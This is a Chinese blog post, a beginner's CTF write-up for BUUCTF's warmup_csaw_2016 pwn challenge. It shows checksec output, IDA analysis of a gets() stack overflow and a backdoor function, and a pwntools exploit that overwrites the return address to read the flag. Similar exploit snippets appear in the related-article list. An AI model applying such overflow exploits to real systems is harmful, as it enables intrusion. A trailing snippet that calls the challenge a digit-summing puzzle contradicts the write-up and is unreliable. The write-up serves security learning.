CTF buuoj pwn-----第3题:warmup_csaw_2016

最新推荐文章于 2023-03-11 15:06:47 发布
最新推荐文章于 2023-03-11 15:06:47 发布
阅读量1.6k 收藏 8
点赞数 3
分类专栏: PWN 文章标签: python pwn 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bing_Max/article/details/119973711
版权

CTF buuoj pwn-----第3题: warmup_csaw_2016

前言

记录一下pwn的过程 同第1、2题一样,新手学习日记,流水线记录.
打开题目, 连接靶机,下载文件’warmup_csaw_2016’

在这里插入图片描述

一、checkesc ,检测文件的保护机制

bing@bing-virtual-machine:~$ checksec ./warmup_csaw_2016
[*] '/home/bing/warmup_csaw_2016'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

从图上可以看出它是一个64位程序,仅开启了栈不可执行保护, 没有打开NX防护(堆栈可执行),No PIE.
这里可以对比一下第1题:https://blog.csdn.net/bing_Max/article/details/119947896
可猜测为 溢出漏洞.,

二、静态分析,IDA打开文件

IDA打开文件warmup_csaw_2016

  • 按下shift+f12,打开string window
    发现 cat flag.txt

在这里插入图片描述

  • 双击cat flag.txt, 点击command, 点击X, 发现cat flag.txt的address在可疑函数sub_40060D里

在这里插入图片描述

  • 按下f5,发现int sub_40060D()函数就是一个简单的system()函数,这个函数的作用就是输出flag的文件信息.
    在这里插入图片描述
  • 这就找到解题思路: 想办法触发后门函数sub_40060(),记下次函数地址为0x40060D
    在这里插入图片描述
  • 回到主函数,看到危险函数gets(), 这就明确了是栈溢出的题目

在这里插入图片描述

在这里插入图片描述

  • 双击v5,v5 64db ,再加上r(返回地址)8个字节,所以要达到溢出,需要总长度为72 db

三. 编写exploit

from pwn import *  

sh = remote('node4.buuoj.cn', 28978)
payload = b'a'*72+p64(0x40060D) 
sh.sendline(payload)

sh.interactive()

四. 运行EXP, 获取flag

bing@bing-virtual-machine:~/pwn$ python3  ./warmup_csaw_2016.py
[+] Opening connection to node4.buuoj.cn on port 28978: Done
[*] Switching to interactive mode
-Warm Up-
WOW:0x40060d
>flag{32892a46-9853-424a-a09a-cbaf5820ce47}
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive

flag{32892a46-9853-424a-a09a-cbaf5820ce47}

Hex_bing
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF-warmup_csaw_2016 (新手pwner的成长日记3)
weixin_58410275的博客
04-23 1000
解释一下这里填充数据为什么是4*16,我们在ida里面双击v5这个字符进入栈区一看,它是在s的基础上,从0到40的var_40占用的是4*16个字节的空间,+8是因为64位文件的rbp需要填充。的函数,进去一看,不得了不得了,我们的payload直接利用sub_40060D函数就行了,甚至不需要获取shell权限,地址在反编译之前可以在函数末尾看见的,就不做展示了。由于文件的漏洞函数直接打开了flag文件,所以我们直接得到了flag的交互。然后我们再翻一翻,找一找,有个。gets的内容,这里思路就到达。
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 397
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
BUUCTF|PWN-warmup_csaw_2016-WP
l2645470582_的博客
07-28 449
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec warmup_csaw_2016 3、我们看到该文件是64位的文件,我们用64位IDA打开该文件 3.1、shift+f12查看该文件的关键字符串 3.2、双击关键字符串,f5进入反编译代码区 查看main函数 3.3、我们看到s和v5字符数组,查看他们所占字节 v5有溢出: r(返回地址): 关键字符串函数地址 4、编译代码 #i...
[BUUCTF-PWN] warmup_csaw_2016
m0_46098032的博客
01-03 356
下载文件,checksec看一下,保护都没开,64位文件。 用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。 看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。 sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。 exp为: from pwn import * p = remote('node4.buuoj.cn', 2574...
CTF buuoj pwn-----第9:jarvisoj_level2
bing_Max的博客
09-27 753
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .
BUUCTF PWN 1-15
农夫果园好好喝的博客
08-21 2060
经典栈溢出漏洞。
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctfctf-pwn收集
最新发布
03-31
ctfCTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Write-up:CTF撰写和信息
03-21
CTF(Capture The Flag)是网络安全领域的一种竞赛形式,它模拟了现实世界中的安全挑战,参赛者通过解谜、逆向工程、网络攻防等手段获取“旗子”(通常是代表解成功的字符串),以此来得分。CTF比赛涵盖了密码学、...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
warmup_csaw_2016
m0_52231248的博客
11-02 123
目环境是Ubuntu16默认libc2.23 Cheksec程序架构是amd64没有开启任何保护 运行程序程序给我们提示了wow:0x4006d Get函数存在栈溢出,offest=0x40+8个字节 快捷键g跳转程序提示的0x4006d, 发现存在后门函数system(“cat flag.txt”) 于是我们构造exp: from pwn import* r=remote("node4.buuoj.cn",27357) cat...
BUUCTF pwn——warmup_csaw_2016
CNS-Enterprise BCC-1701-J
03-11 115
BUUCTF练习
2016_CSAW_CTF_Quals_Reverse_Rock100 Writeup
ACdream
04-14 1791
百度杯提供了Rock目 GitHub上有Writeup 先运行找关键点 1234是自己随意输入的,可以看到提示字符串:Checking和Too short or too long 说明检查函数给了我们提示字符,用IDA-string查找一下 至少看到了两个关键函数:4016BA和4017E6 还有个FLAG的字符串,猜测是作为初始化的值然后需要做运算等,4015D
初学pwn-BUUCTF(warmup_csaw_2016)
天柱的博客
08-31 334
初学pwn-writeUp BUUCTF的第三道warmup_csaw_2016。 首先链接远端, 发现这里输出了一个十六进制的数字,就没有了后续。我们下载文件,持用ida打开查看。 可以看到主函数这里上边全部都是输出,只有最后return的时候,有一个get命令,给v5这个数组进行赋值。从这里可以发信啊,刚刚输出的一个地址,是sub40060D这个函数的地址。点进去看一下。 哦吼,cat flag.txt,那没毛病了,只需要在主函数的get这产生栈溢出,覆盖掉返回的值,就可以执行这个函数,获取f
BUU-warmup_csaw_2016
qq_45771413的博客
04-27 174
查看保护 啥都没保护[滑稽] IDA 很明显的gets输入漏洞,撑爆v5即可 cat flag也很贴心地加了system…… EXP from pwn import * p=remote('node3.buuoj.cn',25059) p.sendline('A'*64+'a'*8+p64(0x400611)) p.interactive() flag flag{cda4b354-70c5-4017-bc79-df3428ae7722} ...
今天你pwn了吗(上)
蚁景网安学院
05-07 3984
前言:"二进制太难了", 一起到 buu 开始 刷吧。这里 仅记录 下 非高分目的 解思路和 知识讲解。特别是文章里的函数,我特意整理了下,还请好好学习下。test...
CSAW CTF 2016 mfw Writeup
weixin_43622501的博客
03-31 1136
CSAW CTF 2016 mfw Writeup 0x01 需要知道的## 本地文件包含 git源码泄露 0x02 本地文件包含 来自维基百科的解释: In PHP the main cause is due to the use of unvalidated user-input with a filesystem function that includes a file for exe...
warmup_csaw_2016 1
03-16
这是一道CSAW 2016年的预热目,需要我们在给定的字符串中找到所有的数字,并将它们相加起来。 具体的做法是,我们可以遍历字符串中的每一个字符,判断它是否是数字,如果是数字就将它转换成整数并加到总和中。最后输出总和即可。 以下是Python代码实现: ```python s = "Th15_15_4_l0ng3r_fl46_th4n_1t_n33ds_t0_b3" total = 0 for c in s: if c.isdigit(): total += int(c) print(total) ``` 输出结果为:`45`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值